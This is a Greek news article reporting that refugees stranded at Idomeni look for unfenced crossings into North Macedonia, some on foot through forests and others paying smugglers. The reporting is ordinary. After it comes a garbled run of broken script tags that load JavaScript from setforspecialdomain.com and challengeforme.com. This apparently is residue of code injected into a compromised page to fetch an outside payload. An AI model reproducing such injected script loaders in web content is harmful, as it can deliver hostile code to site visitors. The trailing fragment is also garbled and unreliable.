‘Τρύπες’ στα κλειστά σύνορα των Σκοπίων προς τα Βαλκάνια ψάχνουν οι πρόσφυγες

Ειδομένη

Νέα περάσματα στα σύνορα Ελλάδας – Σκοπίων αναζητούν οι πρόσφυγες, που είναι εγκλωβισμένοι εδώ και εβδομάδες στην Ειδομένη. Περνούν μέσα από δάση και βουνά, είτε μόνοι τους είτε πληρώνοντας εκατοντάδες δολάρια σε διακινητές

Μετά από εβδομάδες “εγκλωβισμού” στην Ειδομένη λόγω των κλειστών συνόρων, πρόσφυγες και μετανάστες έχουν αρχίσει να αναζητούν άλλους τρόπους για να μπουν στα Σκόπια και να συνεχίσουν το ταξίδι τους με την ελπίδα για μια καλύτερη ζωή.

Σύμφωνα με το Reuters, το βράδυ του Σαββάτου ομάδα περίπου 70 ατόμων, αφού διέσχισε δασική περιοχή, πέρασε μετά από τέσσερις ώρες περπατήματος στο έδαφος των Σκοπίων από σημείο, στο οποίο δεν υπάρχει φράκτης. Αρκετοί ακόμα είναι οι πρόσφυγες και μετανάστες που σκέφτονται να φύγουν από την Ειδομένη και να αρχίσουν να ψάχνουν τα “τρωτά” σημεία των συνόρων για να προχωρήσουν προς τη δυτική Ευρώπη.

“Δεν υπάρχει άλλη λύση. Ας έρθει κάποιος στη θέση μου, τι θα έκανε με αυτή τη ζωή; Θα ήταν εντάξει με ό,τι συμβαίνει;”, δήλωσε ένας Σύριος. Ένας συμπατριώτης του, είπε ότι θα προσπαθήσει να περάσει από τα αλβανικά σύνορα: “Υπάρχει μια πιθανότητα να φτάσεις εκεί μέσω των Σκοπίων αλλά ο στρατός θα σε στείλει πίσω”.

Ορισμένοι πρόσφυγες και μετανάστες αποφασίζουν να προσπαθήσουν μόνοι τους να φύγουν από την Ειδομένη ενώ άλλοι πληρώνουν 350-600 δολάρια το άτομο, σε διακινητές.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >